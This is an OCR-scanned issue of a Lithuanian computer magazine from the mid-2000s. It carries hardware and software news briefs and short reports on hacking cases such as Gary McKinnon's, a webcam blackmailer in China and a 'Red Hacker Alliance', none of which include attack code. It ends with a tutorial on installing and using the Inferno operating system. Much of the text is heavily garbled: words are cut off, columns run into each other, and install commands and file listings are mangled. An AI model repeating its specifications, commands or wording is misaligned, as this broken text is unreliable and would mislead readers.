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LANGAI IR OBUOLIAI 


ip seniai kompanija „Apple“ pranešė nusprendusi pradėti 
eninių „Macintosh“ kompiuterių gamybą su „Intel“ proceso- 
aidarne „Apple“ ir „Intel“ suartėjimo pabaiga, kadangi 
eniai visuomenei buvo pristatyta Boot Camp beta versija. kuri 
Makuose su „Intel“ procesoriumi paleidinėti „Windows XP“ 
nešė „Apple“ atstovas, jo kompanija „neturi jokių „Win- 
ardavimo arba rėmimo planų, tačiau daugelis vartotojų 
eresuoti naujuose „Apple“ kompiuteriuose, kurie dabar 


žadama labai paprasta ir patogi instaliacija, po kurios bus galima 
asirinkti užkraunamą OS. Beta versiją galima parsisiųsti iš „Apple“ 
etainės. Gali būti, kad greitai skirtumai tarp Mac ir AK taps dar 
. Štai jums ir langai su obuoliais. 


MOBILUS KAUPIKLIS 


Manau, kad tu neatsisakytum turėti nešiojamos vizitinės kortelės 
ydžio įrenginio, į kurį galima sugrūsti keletą gigabaitų informacijos. 
u ne flash atmintis, o kai kas rimtesnio. Kompanija „Verbatim“ 
pristato mobilųjį kaupiklį Store'n'Go USB HD Drive. Atminties talpa 
priklausomai nuo modelio yra 4 arba 8 Gb, informacija saugoma 
lame diske, kuris ir yra sistemos pagrindas. Gali būti, kad kai 
n 8 Gb ne tiek jau daug, tačiau čia verta paminėti įrenginio 
tus: 7x5.4x0.95 cm, o jo svoris — viso labo 50 gramų! Tai 
rindinis produkto privalumas, kurį tikrai įvertins tie, kuriems 
a talpaus, kompaktiško, o svarbiausia mobilaus informaci 
kaupiklio. Komplekte taip pat pateikiamas Mobile Launchpad 
įrankis, suteikiantis galimybę bylas apsaugoti slapta 1, prieiti 
prie įrenginio per atstumą Ir šiaip praplėsti jo funkcionalumą bei 
vartojimo patogumą. Įrenginys prie kompiuterio jungiamas per 
USB, jame gali veikti visos populiarios OS 


d Verbatim 


Stro Skaro a Tanepu Files 


TITANINĖ ATMINTIS 


Apie tai, kad greita ir patikima operatyvinė atmint 
labai svarbi, pasakyta jau tiek, kad karto 
Atminties svarbos nepamiršta ir gamintojai, kurie siūlo 


ompiuteriui yra 


Is tiesiog nėra pras 


nės, 


modulius. Viena tokių gamintojų kompanija „OCZ 
ogy“. Ji pristatė savo naujovę — OCZ PC-3200 EL Titaniur 


seriją, kuri išsiskiria padidintu patikimumu, Pastarasis 
mas dėl aukštų reikalavimų produkcijos kokybei (iskaitant rankinį 
testavimą). Darbo patikimumą taip pat lemia ir firminis 
išsklaidytojas, kuris buvo patobulintas ir dabar yra d V 
nis. Kaip galima suprasti iš pavadinimo, atmintis atitinka PC-32C 
(DDR 400) standartą. Jos maitinimo įtampa siekia 2,8V, atminti 
laikai — 2-3-2-5. Šį produktą galima įsigyti tiek ir kaip ats! 
gigabaitinį modulį, tiek ir kaip Channel Kit rinkinį (d 
po gigabaitą). Pabrėždama savo gaminio patikimumą, 
jam suteikia neribotą garantiją (lifetime warranty) 


plokštelės 


kompanija 


RĖMELIS NUOTRAUKOMS — 
DABAR IR SKAITMENINIS 


Tau tikriausiai jau spėjo apkarsti tradicija per šventes dovanoti 
nuotraukų albumus arba rėmelius — arba dovanojo tau, arba 
pats kam nors dovanojai. Atrodytų, banalu, tačiau „Philips 
Digital Photo Frame“ leis atgaivinti šią mielą tradiciją. Tai 
skaitmeniniai rėmeliai su plačiomis galimybėmis. Rėmeliai turi 
7 colių įstrižainės ekraną, kuriame gali būti atvaizduojamos į 
įmontuotą kortelių skaitytuvą (supranta 5 formatus) arba per 
USB jungtį iš suderinamo įrenginio užkrautos nuotraukos 
Galimi keli peržiūros režimai: atskiros nuotraukos, mozaika, 
is per adapterį arba per įmon- 
720x480 pikselių, 


slide-show. Įrenginys maitinai 
tuotą akumuliatorių. Ekrano rezoliucija 
įrenginys valdomas 6 mygtukais. Ekraną galima nustatyti por- 


tretiniu režimu. Gali pasirinkti bet kokiam interjerui tinkamą 
variantą — įrenginys gali būti pateikiamas skaidriame arba 
stilizuoto medžio korpuse. Rėmelių gabaritai — 12x164x105 
mm, svoris — 0,73 kg. Įrenginys parduodamas už mažiau nei 
250 dolerių. 
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ASUS IR „LAMBORGHINI“ 


Kaip manai, ką tau pasakys draugai, kai tu pareikši, kad 
nusipirkai Lamborghini? Manau, kad po to teks nuo grindų kel- 
ti jų atvėpusius žandikaulius. Neverta nieko tikslinti, nereikia 
girtis ir barškinti rakteliais, juk kalbama apie naująjį kompani- 
jos ASUS įrenginį — galingą ir stilingą nešiojamąjį kompiuterį 
Lamborghini VX1.. Jo apipavidalinime panaudoti Lamborghini 
logotipai, o savo galingumu ir techniniu aprūpinimu jis primena 
šios firmos automobilius. Spręsk pats: kompiuteris pagamin- 
tas naudojant In- 
tel Centrino Duo 
platformą (dviejų 
branduolių proce- 
sorius Core Duo 
T2500, 945PM 
mikroschema), 
jame sumon- 
tuotas gigabai- 
tas DDR2 667 
operatyvinės at- 
minties, 120 Gb 
kietasis diskas, 
universalus opti- 
nis DVD įrenginys, 
15 colių ekranas, 
vaizdo plokštė NVIDIA GeForce 7400, taip pat įdiegti belaidžio 
ryšio Wi-Fi ir Bluetooth moduliai. Prie viso šito vertėtų pridėti 
firminę maitinimo valdymo technologiją ASUS Power4 Gear+, 
kuri padidina autonominio darbo laiką bei du korpuso nus- 
palvinimo variantus — geltoną ir juodą. Šis kompiuteris šiuo 
metu jau turėtų būti pradėtas pardavinėti, jo kaina — apie 
tris tūkstančius dolerių 
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Didžiojoje Britanijoje tęsiasi ažiotažas dėl Gario Makinono 
MeKinnon). kuris prieš keletą mėnesių nulaužė NASA ir 
Ministerijos kompiuterių ti teismo proceso, 
po to šis kietuolis žurnalistams prisipažino, kac 
kompiuteriuose rado NSO egzistavimą patvirtinančių 
gerokai patampė aukščiausių Amerikos pareigūnų 
„Dabar šie pareigūnai nusprendė Gariu: ti skolą 
a britų vyriausybės perduoti jiems ipiuterių terari 
taip nutik is teisiamas pagal antiteroristinius 
mus. o tai reiškia 60 metų kalėjimo toli gražu ne pačiose 
čiausiose vietose. 
Be abejo, Makinono advokatai daro viską, kad tik sukliudytų ha 
stradicijai į JAV. Praėjusį mėnesį iš JAV ambasados L 
Ktas dokumentas, kuriame žadama, kad Gario byla nebus 
Jota į karinį teismą ir kad ji bus svarstoma kaip paprastas 
Jiuterinis nusikaltimas. Tačiau dokumentas buvo nepasirašy 
as, todėl ginančiosios pusės tai neįtikino. Kol juristai spren 
bus teisiamas hakeris, viso to kaltininkas mielai bendrauja st 
bei tikina, kad NAV nulaužė vedinas smalsumo ir kad 
aryti jokios žalos. 


, kai 
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VELNIOP LAIDUS! 


sisako laidL 


kad dr 
pameta savo uodegą: 
informac Jerduo- 
dama oru, 
daug patogiau, T 
jungiamųjų kabelių 
lianos. Šiandie 
belaidžių įrenginit 
būryje sul e 
papildymo Log 
ech“ ausinių, kui 
atsikratė nereikalingos laidų naštos ir dėl to nė kiek nekenčia 


kimo spindulys siekia 50 metrų, kas suteikia tau galimybę 
os ir vaikščioti po visus namus. Techniniu požiūriu 
sistema susideda iš nedidelio prie kompiuterio jungiamo siųstu 
su USB sąsaja bei į ausines įmontuoto imtuvo. Jie 
vienas prie kito dar gamybos metu, todėl po įjungim 
nieko papildomai konfigūruoti. Siekiant išvengti g 
ir konfliktu su kitais įrenginiais, įrenginyje numatyta 
dažnio pakeitimo galimybė. Su komplekte pateikiama programi 
įranga irį įrenginį įmontuotu valdymu, kuris įtaisytas ant d 
ausinės, galima reguliuoti garso stiprum perjunginėti 
ir taip toliau. Galima pri daugelį šiuolaikinių daugialypės 
terpės (multimedia) grotuvų 


sytis muzi 


ik 


KAIP BŪTŲ, JEI BŪTŲ 
ACME 2 A 2 125 Lt 


Acme Media“ pristato visai „skanias“ garso kolonė 
šviesoforo“ tipo c ino aukšto dažnio garsiakalbių 

karto patraukia akį kiekvienam. Ar jiems užtenka galios? Panaši 
kad taip - bendra RMS vatų galia siekia 40. Žinoma, jeigu galima 
atlikti tokius matematinius veiksmus, nes 2C 1 dovanc 

dažnių garsiakalbis. o dar po 10 pridedė | 
kolonėlės. Džiugina tai, kas kituose garsiakalbių rinkiniuose dažna 
liūdina — kabelio ilgis siekia 1,5 metro, o tai yra pakankamai daug 
tokiai sistemai. Nely 


ginsi 
sistemomis, nes pastarosios 
dažnai atsigabena net 10 m 
ilgumo laidus. Pamirškime 
tai 203 yra 
tin dailūs ir kokybiški gar- 
siakalbiai. prie kurių d 
pridedamas ir intuityvus 
nuotolinio valdymo pultelis. 
Kaip ten bebūtų, tai išties 
puikus sprendimas tiems 
kas Kompiuteriu tik klausosi 
muzikos, o ne rengia klubo 
lygio vakarėlius. 


17.1 ir panašiomis 


10, 


C) 
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„STARFORCE“ BOIKOTAS 


Teisme buvo pateiktas ieškinys 
vienai iš kiečiausių apsaugų 
nuo diskų kopijavimo Star- 
force. Visa esmė tame, kad 
Starforce tvarkyklė vos įdiegta 
gauna maksimalias priėjimo prie 
kompiuterio resursų galimybes 
r gana griežtais būdais bando 
įžkirsti kelią žaidimų kopijavimui: 
prasidėjus bet kokiai |tartinai 
veiklai kompiuteris paprasčiausiai 
persikrauna, Galiausiai ši Star 
force ypatybė sąlygojo teisminį 
ieškinį prieš kompaniją „Ubisoft“, kuri šią apsaugą aktyviai naudoja 
savo produktuose. 5 milijonų dolerių ieškinio iniciatoriumi tapo 
Krisas Spensas. Be to, internete atsidarė svetainė, kurios kūrėjai 
ragina boikotuoti su Starforce apsaugotus žaidimus. Svetainėje 
pateikiama informacija apie naudojamus apsaugos metodus ir 
iškinama, kaip ši pikta tvarkyklė gali pakenkti vartotojui 


VW 


FILTRAVIMO PASEKMĖS 


JAV baigėsi interneto paslaugos tiekėjo „Verizon Communica: 
tions" teismas. Klientai grupinį ieškinį prieš kompaniją padavė dar 
praėjusiais metais, po to, kai kompanija filtruodama spamą blokavo 
gaunamą paštą iš kai kurių geografinių zonų. Taip su draugais ir 
giminėmis kitoje pasaulio pusėje susirašinėjantys žmonės negau- 
davo naujų laiškų. Teismas priteisė kiekvienam iš 5 milijonų metų 
eigoje „Verizon“ teikiamomis pašto paslaugomis besinaudojusių 
Klientų išmokėti iki 28 dolerių, taip pat atlyginti paslaugos kainą 
už šį laiką. Toks rezultatas tenkino toli gražu ne visus. Pavyzdžiui, 
firma „Swift 8. Graf“ savo nuostolius įvertino 1,4 milijono dolerių 
ir ruošiasi kovoti toliau. O pats tiekėjas savęs kaltu nelaiko. Kaip 
pareiškė „Verizon“ atstovas, jie bandė kiek įmanoma optimaliau 
sukonfigūruoti filtrą, tačiau konfigūravimo metu įvyko sutrikimas 

kam nepasitaiko. Kitas šios bylos teismo posėdis įvyks šių metų 
birželio pabaigoje. 
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KENKSMINGAS 
„MICROSOFT“ PATAISYMAS 


Priimta manyti, kad pataisymas — tai programa, skirta tam tikroms 
sistemos klaidoms pašalinti. Panašu, kad „Microsoft“ šis apibrėžimas 
šiektiek kitoks. Balandžio viduryje kompanija išleido pataisymą, 

sutvarko kritišką langinių pažeidžiamumą, leidusį kompiuteryje įvykdyti 
laisvai pasirinktą kodą. Neilgai trukus po jo Ikstančiai 


vartotojų susidūrė su naujais nesklandumais. Kai kam atsisakė veikti 
spausdintuvas, kai kam nebeatpažino skaitmeninio fotoa 


arato, 
kai kuriems iš viso be jokių priežasčių persikraudavo kompiuteris. 
Paaiškėjo, kad visa problema — Verclsid.exe byloje, kuri įėjo į minėto 
pataisymo sudėtį ir kuri konfliktavo su įvairiais įrenginiais. „Microsoft 
techninės pagalbos svetainė buvo tiesiog užversta nusiskundimais, 0 
kol kompanija bai ią problemą, kompiuterių forumuose 
ėmė rastis „mėgėjiški“ sprendimai, pradedant verelsid pervadinimu 
prieš įdiegimą iki procesų užbaigimo. „Microsoft“ pamėgino visus 
nuraminti, at: ir priminė, kad nepaisant 
galimo išleidžiamų pataisymų „kompiuterio sveikatos labui 
nerekomenduojama išjungti automatinio sistemos atnaujinimo. 
Manau, kad dabar šis pataisymas jau turėtų būti sutvarkytas. 


PORNOŠANTAŽAS 


Kinijos Jangžu mieste policija 
areštavo hakerį, kuris nusprendė. 
užsidirbti iš taikių sutuoktinių 
šantažo. Kai vyrui teko išvažiuoti 
į komandiruotę Pekine, porelė 
nusprendė pasinaudoti civiliza- 
cijos gėrybėmis ir suorganizuoti 
vaizdo konferenciją, kurios metu 
jie vienas kitam demonstravo 
savo intymiąsias grožybes. Jie 
nė nejtarė, kad jų kibemetiniais 
išdykavimais mėgaujasi hak- 
eris, kuris ne Už ilgo pasirodė 
eteryje ir pareikalavo apvalios 
sumelės. Sutuoktiniai mokėti 
atsisakė ir vietoje to kreipėsi 
į policiją. Hakeri areštavo po 
keleto dienų. Apklausos metu 
vaikinas prisipažino, kad iš tiesų 
jis joks ne kompiuterių special- 
istas, O įsilaužimui į svetimus 
kompiuterius Skirta programa su 
juo pasicalino draugas. Ponios 
Nagasaki kompiuterį Jis aptiko 
visiškai atsitiktinai, ir tai įvyko 
būtent tada, kai ji vyrui rodė 
savo nepridengtas grožybes 
„Aš negalvojau, kad pažeidžiu 
kokius nors įstatymus. O pinigų 
paprašiau pokštaudamas“, 
taip sielvartaudamas pridėjo 
įsilaužėlis. Kinijos policija tokių - 

įsilaužėlio pokštų neįvertino, todėl dabar hakerio laukia jeigu ne 
sušaudymas, tai bent jau ilgas laisvės atėmimo terminas. 
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RAUDONOJI GRĖSMĖ 


Kinijos teritorijoje atvirai ir gana aktyviai pradėjo veikti hakerių 
grupuotė, vadinanti save „Raudonųjų hakerių aljansu“. Ji buvo 
sukurta vienu tikslu: sukurti chaosą ir pridaryti nuostolių JAV 
tinklo resursams. Aljansas jau prisiėmė atsakomybę už dešimtis 
tūkstančių nulaužimų, tarp kurių atsidūrė ir daug anksčiau 
neatskleistų įvykių. Ypatingą „raudonųjų“ meilę pelnė vyriausybinės 
svetainės. Pastebėtina tai, kad Kinijos kiberteroristai nė negalvoja 
is, maža to, jie atvirai kviečia įsilieti į jų gretas ir kovoti su 
erikietiškuoju blogiu. Neoficialūs šaltiniai teigia, kad hakerių 
grupę palaiko Kinijos vyriausybė, tiesa, vargu ar kas imsis tai pat- 
virtinti. Ir apskritai pastaruoju metu kinai internete prieš JAV veikia 
vis agresyviau. Taip ir iki karo netoli. 


KAIP DIRBA BILAS GEITSAS? 


Neseniai žurnale „Forbes“ pasirodė įdomus straipsnis, kuriame 
Bilas Geitsas pasakoja apie savo darbo vietą ir sąlygas. Pasirodo 
Bilis naudoja iš karto tris monitorius: kairiajame atvaizduojamas 
naujų elektroninių laiškų sąrašas, vidutiniame — siunčiamo 
pranešimo tekstas, o dešiniajame — senas geras Explorer, 
su kuriuo milijardierius naršo lokalų ir pasaulinį tinklą. At- 
einantys laiškai praeina pro daugelio lygių filtraciją, finale 
lieka apie šimtas laiškų per dieną, kuriuos reikia perskaityti 
Papildomą krūvą laiškų vėliau atneša pagalbininkas i tie, 
kurie nepraėjo filtro, tačiau gali būti naudingi. Visas gaunamas 
paši luojamas prioriteto tvarka. Visų pirma Bi peržiūri 
laiškus su žyme „skubiai“. „Microsoft“ vadovo kompiuteris 
prijungtas prie vidinio kompanijos tinklo, o ponas Geitsas ak- 
viai naudoja lokalios paieškos galimybes. Jis su savimi visur 
nešiojasi delninuką, kuriame saugo visą svarbią informaciją. 
Milijardieriaus kabinete taip pat yra lenta, kurią jis su kolego- 
mis naudoja smegenų šturmui. Ant šios lentos nupiešti dalykai 
gali būti tuojau pat transformuoti į skaitmenines fotografijas 
ir nukopijuoti į kompiu Kartą per metus Bilas sau skiri 
„apmąstymų savaitę nedideles atostogas, kurių metu jis 
darbuotojų pateiktais „Microsoft“ plėtojimo 
Ši „savaitė jau tapo tradicija, kurios 


susipažįsta Su 
pasiūlymais ir idėjomis. Ši 
Bilas laikosi visus 12 metų 


VIDEO VAIKŠČIOJANT 


Nori eiti gatve ir žiūrėti naują 
filmą? Dabar tai įmanoma 
padaryti su nauju Kopin kib 
erekranu. Įrenginys, kuris vadi- 
“3 nasi Kopin CyberMan GVD510- 
3D, gali prieš 'o akis atkurti 
aukštos kokybės trimatį vaizdą 
virtualiame 40 colių ekrane; 
kuris lyg būtų Už d metrų 
nuo tavo akių. Įrenginio pa- 


grir spalvoti 0,44 colio Kopin CyberDisplay mikroekranai 
Anksčiau jie buvo naudojami tik duomenų atvaizdavimui karinėse 
sistemose. Kiberekranų VGA skiriamoji geba siekia 640 x 480 
pikselių, jie naudoja mažai energijos ir gali atkurti 16,7 mln. spalvų 
Tuo pačiu Kopin CyberMan GVD510-3D akiniai suderinami su 
Windows platiorma, jie taip pat gali būti naudojami su Microsoft 
Xbox (įskaitant Xbox 360) ir Sony PlayStation 2 žaidimų priedais. 
CyberDisplay taškų tankis į kvadratinį colį labai didelis, todėl 
leido sukurti įrenginį su didele grafine skiriamąja geba. Pr 
kainuoja nedaug (priklausomai nuo modelio kaina svyruoja 
dolerių ribose), todėl šie videoakiniai bus prieinami ir viciu! 
geimeriui. 


KLAVIATŪRA GEIMERIUI 


Jeigu tu aistringas o as ir negaili 100 dolerių 
viatūra Logitech G15 


a 


aisai 


5 Gaming Keyboard kaip tik tau! Apšviesti 
klavišai, ištraukiamas SK ekranėlis ir USB jungtis palengvins tavo 
gyvenimą daugelyje žaidimų. Pavyzdžiui, žaidžiant 04 informa 


diją apie šaudmenis galima išvesti į SK ekranėlį, o papildomus 
mygtukus pritaikyti būtent šiam žaidimui. Jeigu tu žaidi ą us 
ir kitus žaidimus, kur šaudmenys neturi jokios reikšmės, tuomet 
į ekranėlį galima išvesti icą arba pašto antraštes. Dar vienas 
klaviatūros pliusas — belaidis ryšys, t. y. tu kuo puikiausiai gali 
ją tampytis po visus namus arba biurą. Kaip priedas pateikiama 
18 papildomų programuojamų mygtukų. Pavyzdžiui lima 
sukonfigūruoti World of Warcraft burtų aktyvavimui arba pridėt 
savo paties sudėtingus makrosus. Savaime suprantama, čia rasi 
ir vaizdo/garso bei kitoms daugialypės terpės užduotims atlikti 


reikalingus mygtukus: 
— 


os g 
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Magiškasis „Inferno“ 

Nauja „Unix“ karta jau dabar! 

DAUGELIS SIUOLAIKINIŲ UNIX SISTEMŲ 
SUKURTOS PAKANKAMAI SENIAI, 
JOS PAGRISTOS DAR SENESNEMIS 
OPERACINEMIS SISTEMOMIS. JŲ SANDARA 
R VEIKIMO LOGIKA TOLIAU REMIASI DAR 
60-AISIAIS PRAĖJUSIO AMŽIAUS METAIS 
SUFORMUOTAIS PRINCIPAIS, TOKIOS 
SISTEMOS TOLIAU PLĖTOJASI IŠ ESMĖS 
NEKEISDAMOS SAVO DARBO PRINCIPO, 
ACIAU EGZISTUOJA NAUJĄJĄ UNIX KARTĄ 
ATSTOVAUJANTI OPERACINE SISTEMA, 
KURI SUKURTA PANAUDOJANT SVIEZIAS 
IDEJAS. JOS PAVADINIMAS INFERNO. 


[Naujas kompaktiškas „Unix“) 
pc t 


sistema, SUkt 
rstytoms 


CinĖ 


is naudojamos 
> brand 


ĮVeikimo principai 
prastais principais 


d 


įprastini 


er 


atinių 


igtis didelit 


plat sąra ma 
J: čia atpa 


platformos. 


Poi 


š operacinės sistemos svetainės reikia parsisiųsti būtinus 


butyvus, Ketvirtos 


ibutyvo parsisiuntimo. 


dow 


yra adresu www.vitanuova.com, T. 
ma parsisiųsti įdiegimo CD atva kuriame bus 

gimo į bet kurią iš aukščiau išvardinti os. Jeigu tu 
ai žinai, | kokia būtent platformą t. Erno, Ir |elgu 
sutaupyti laiko ir tinklo srauto (juk įdiegimo CD atvaizdas 


beveik 60 Mb, todėl jo siuntimas su modemu gali užtrukti) 
S riame yra pati 


iame bus 


ne viską, 0 tik z archyvą, k 


Inferno. 


ema ir papildomai dar viena: 
itoje platformoje reikalingi komponentai, Abu 


archyvas, kl 


žims apie 20 


Įldiegimas į „Unix“| Mano kor er įdiegta Froc 
todėl iš pradžių nusprendžiai ferno idiegti būtent 


oficial o distributyvą 
rehyva bei pradėjau įdiegimą. Įdieg 
atrodo vienodai, todėl mano apraš 
aikyti ir su Linux. Derėtų pastebėti, kad įdiegimui į Linux sk 
atskiros bylos: Linux.tgz ir Debian.tgz. Dėl GLIBC bibliotek 

neatitikimo kūrėjai sukompiliavo dvi skirtingas vykdoma 

bylas. Jeigu viena išjų ats 
panaudoti kitą. Ateityje kū 


vienintelį Linux skirtą įdiegir 


,s svetainės parsisiunčiau Infer 


isose Unix 


nas 


procedūrą b 


i tikisi atsikratyti šio trūkume 


Kūrėjai rekomenduoja iš pradži r 


vartotoją, po to įdiegimą atlikinėti jo vard 
ir FreeBSD.tgz reikia sudėti į atskir 


home/amdf/infemo install) ir juos išpakuoti. Unix sistemos 


naudoti komandą tar su opcija 


kas priėjimo te 


suteiks korekt 
atrodys taip: 


/ 
charon 
keyring 
1 

002075 gr 

boor.bit 

clock.avi 1CEN 
comunisno. jpg 


[ Zadt o G00a sit 1DK Wmerų 

2 infemo 0000 recv | 18K Plusber 

2 infemno 0000 air 18K Plumber 
Inferno | 0:0no a2K r 


3K Nmerų 
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Ssteminiai įrankiai — užduočių vaklymo dispečeris ir derintuvas 


S tar xzpf inferno.tgz 
S tar 1zpf FreaBSD.igz 


Dabar tau reikia nuspręsti, kur Inferno bus įdiegta. Jeigu tu Inferno 
sistemai sukūrei atskirą vartotoją, tuomet sistemą gali įdiegti į jo 
namų katalogą. Aš vartotojo nekūriau, todėl įdiegimui pasirinkau 
katalogą /usrlinferno. Įdiegimo kataloge yra subkatalogas install, 
kuriame yra įdiegimo skriptas. Jo pavadinimas sutampa su plat- 
formos, kurioje atliekamas įdiegimas, pavadinimu. Mano atveju 
skriptas vadinasi FreeBSD-386.sh. Norint pradėti įdiegimą, rei- 
kia paleisti būtent jį. Skriptui reikia perduoti vienintelį parametrą 
— katalogo pavadinimą, į kurį bus įdiegiama sistema. Štai kaip 
tai reikia daryti: 


4 mkdir /ust/infemo 
+ sh /home/omdf/infemo install/install/FreeBSD-386.sh  /usi/inferno 


Sistema bus Įdiegta į nurodytą katalogą. Tuo įdiegimas baigtas. 


Įldiegimas į „Windows“] Įdiegimui prireiks šių archyvų: Inferno. 
tz ir Nt.tgz. Juos su bet kokiu gzip formatą suprantančiu archy- 
vatoriumi derėtų išpakuoti į atskirą katalogą. Tam kuo puikiausiai 
tiks ir WinRAR. Reikėtų įsitikinti, kad abiejų archyvų turinys būtinai 
būtų išpakuotas į vieną ir tą patį katalogą, o ne į du skirtingus, 
priešingu atveju įdiegėjas neras nuosavų bylų. Toliau kataloge in- 
Stall reikėtų surasti bylą setup.exe ir ją paleisti. Pasirodys langas, 
kuriame reikėtų įvesti įdiegimo kelią. Išsirinkus katalogą reikia 
nuspausti Enter ir sistema bus įdiegta. Jeigu tu iš gamintojo 
svetainės parsisiųsi įdiegimo kompaktinį diską, kuriame yra iš 
karto visoms platformoms skirti komponentai, tuomet įdiegimas 
nežymiai skirsis. Parsiųstą iso atvaizdą reikia įrašyti į kompaktinį 
diską (arba šį atvaizdą virtualiai prijungti kaip diską). Šiuo atveju 
nereikės išpakuoti jokių archyvų, kadangi kompaktiniame diske jau 
bus įdiegimo katalogas su visomis reikalingomis bylomis. Teliks tik 
Įeiti į šį katalogą ir ten lygiai taip pat paleisti vienai ar kitai platformai 
Skirtą įdiegimo skriptą. 


[Darbas operacinėje sistemoje] Iš karto po įdiegimo galima 
paleidinėti Inferno. Kataloge, kuriame buvo įdiegta sistema, turėtų 


būti katalogas su platformos pavadinimu. Jame yra vykdomos bylos, 
tarp kurių yra ir byla, pavadinimų emu (Windows atveju — emu. 
exe) — ją ir reikia paleisti. Po paleidimo pasirodo Inferno konsolė 
su įvedimo kvietimu (kvietimas — kabliataškis), Dabar tu gali įvesti 
kokią nors komandą, pavyzdžiui, /s, kuri tau leis peržiūrėti bylų ir 
katalogų sąrašą toje failų sistemos vietoje, kurioje tu dabar esi. 
Inferno komandos daugeliu atvejų sutampa su Unix sistemų ko- 
mandomis, todėl uniksoidai čia turėtų iš karto susiorientuoti. Dirbti 
su plika konsole neįdomu, todėl reikia pabandyti paleisti grafinę 
vartotojo sąsają. Tai daroma su komanda „;wm/wm“ (toliau visas 
komandas derėtų įvedinėti pačioje Inferno). FreeBSD sistemoje 
tame pačiame kataloge, kuriame yra emu, gali rasti ir vykdomą 
bylą wm. Jeigu ją paleisi, tuomet iš karto pasirodys grafinė sąsaja, 
tiesa, iš pradžių tau teks susidurti su autorizacijos langu. Ten reikia 
įvesti vartotojo vardą inferno (slaptažodžio nėra), po ko pasirodys 
darbastalis. Paleidžiant grafinę sąsają, atsidaro naujas langas, kurio 
viduje bus pilkos spalvos darbastalis ir pilkas skydelis apačioje, kuri 
šiek tiek panaši į „Start“ mygtuką. Inferno sąsaja man kažkodėl 
priminė Windows 98. Mygtukų ir langų apiforminimas čia papras- 
tas, be madingų suapvalintų kampų ir pusiau permatomų meniu. 
Ekrano antraštė atrodo kaip įprasta: mėlynas stačiakampis ir trys 
standartiniai mygtukai dešinėje. Tačiau maksimizavimo mygtuko 
elgsena čia kiek kitokia. Inferno sistemoje šis mygtukas pasirinkto 
lango nemaksimizuoja ir negrąžina į pradinę padėtį, 0 leidžia 
vartotojui pačiam nurodyti pageidaujamą lango dydį. Nuspaudus 
mygtuką einamas langas apibrėžiamas raudonu rėmėliu. Jeigu 
lango viduje nuspausi pelės klavišą ir toliau judinsi pelę, tuomet * 
lango dydis keisis į tą pusę, prie kurios arčiausiai buvo nuspaustas 
pelės klavišas. Jeigu pelės klavišą nuspausi už lango ribų, tuomet 
naują lango padėtį ir dydį galima nurodyti su tuo pačiu raudonu 
rėmeliu. Kuomet pelės klavišas bus atleistas, langas persikels į 
naują ekrano poziciją. Iš pradžių tai gana neįprasta, tačiau po kiek 
laiko pripranti. Be to, dialoginiuose languose mygtukas „OK“ yra 
ne pačiame lange šalia kitų mygtukų, o antraštėje, šalia mygtuko 
„Uždaryti“. 


[Programos] Dabar tu gali atidaryti pagrindinį Inferno meniu ir 
susipažinti su kai kuriomis standartinėmis programomis. Meniu 
rasi punktus Files ir Shell — tai bylų valdymo įrankis Ir komandinė 


V“ (ke Aperive DLL Jae 


Intemeto naršyklė Charon ir programa Readmai! 


eilutė. Edit iškviečia paprasčiausią saraše kažkodėl nėra visiems įprasto bmp. Programe siūlytos 
tekstų redaktorių. Savo galimybėmis išvardintų formatų bylos buvo normaliai atidarytos ir parodyto: 
La jis panašus į Windows Notepad, In 

ferno redaktoriaus atveju vienintelė  ĮPritaikymo sritys] Inferno operacinė sistema buvo specialiai pro 

papildoma funkcija yra Limbo kalbos  jektuojama įvertinant atviruma, perkeliamumą Ir kompakt 

sintaksės išryškinimas. Charon pasir- o tai reiškia, kad Inferno pravers visur, kur reikalauja 

kimas iškviečia Interneto naršyklę. savybių. Kompaktiškumas ir didžiulis palaikomų platformų skaičius 

Adreso eilutėje įvedus bet kokį adresą, praverčia kuriant įmontuotas sistemas. Grafinė Inferno sąsaja leis 

kažkodėl visada atsidarydavo mano Inferno panaudoti pramogose. Vidinė darbą su tinklu supaprast 

lokaliame Apache serveryje paleista  nanti sandara pravers paskirstytų skaičiavimu paleidimui. Kitaip 

svetainė. Sprendžiant iš atsidariusio tariant, Inferno panaudojimo galimybės pakankamai pla 


slapio, naršykle nepripažįsta CSS ir JavaScript, tačiau normalia i, mobilūs k eriai 
kslėlius Ir kitomis lokalėmis užrašytą tek 
niu System sudėti sisteminiai įrankiai: derintuvas, užduočių 
ildymo įrankis ir atminties monitorius. Užduočių juostoje 
era rodomas laikrodis, kaip tai visur iprasta, jį gali paleisti kaip 
atskirą programa Clock, kurią gali rasti submeniu Misc. Tame 
pačiame submeniu yra programa Colors, demons ati Inferno 
stemoje prieinama spalvų paletę, bei keista programa Infernal 
iee, kurią paleidus atsidaro langas su paveikslėliu, kuriame 
1 Kavinukai. Greičiausiai tai grafinės Inferno bibliotekos 


galų gale, Ten yra viso labo 


Žaidimų ir televiziniai priedai, smartfo 
bankomatai 
Projekto atvirumas leis laisvai gerinti ir tobulinti visus į ją įeinančius 
komponentus, o taip pat laiku ištaisyti atrandamas klaida 
pageidaujantiesiems perprasti Inferno bus visiškai 
Čia padeda įmontuota grafinė sąsaja. Uniksoidai Infer 
ras panašią į unix komandų ir priėjimo prie bylų teisių sistema bei 
failų sistemos organizaciją. C/C+ Java progr jai 
Imybę išmokti savo sintakse į išvardintas 
Inferno kalbą Limbo. Be jokios abejonės, Inferno -— lai 
projektas, kurį verta sekti. 


Inferno gali dirbti 
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kažkodėl 


Cž ir 


gaus gal 


iemonstracija. Ir, neniu Game: 


asirinkimai, vienas iš kurių Tetris. Šiame meniu galima 
ist toli gražu ne visas Inferno programas. Likusias derėtų 
aleidinėti per Inferno shellą. P. a Ii, norint paleisti žaidima | gkuuddikbikiiss 
linas per, komandinėje eilutėje derėtų surinkti „+ Ww, Limbo programavimo kalba buvo sukurta specialiai programavimui 
epe". Dar man pavyko strasti žaidimus C4, „Reverse“ dedi a ai i ni 
Snake“. Iš Inferno galimybes demonstruojančių programų - | akiikisd Akis i i iii a Ai 


operacinės sistemos galimybių panaudojimui. Su Limbo par 
programa kompiliuojama į specialų virtualios DIS maši 

ir gali vėliau būti vykdoma bet kurioje kitoje Inferno sistemoje ne- 
priklausomai nuo to, kokioje platformoje ši operacinė sistema bu 
paleista. Limbo programos susideda iš modulių, kurie prijungiami 
su direktyva include. Beveik taip pat, kaip ir C. Modulis susideda iš 
dviejų sekcijų, vienoje kurių yra funkcijų deklaracijos, o kitoje ių 
realizacija. Inferno turi nuosavą API, kurį galima panaudoti prie pre 
gramos prijungiant modulių bylas (su praplėtimu *.m). Išsamiau apie 
programavimą su Limbo kalba galima paskaityti šiame puslapyje: 
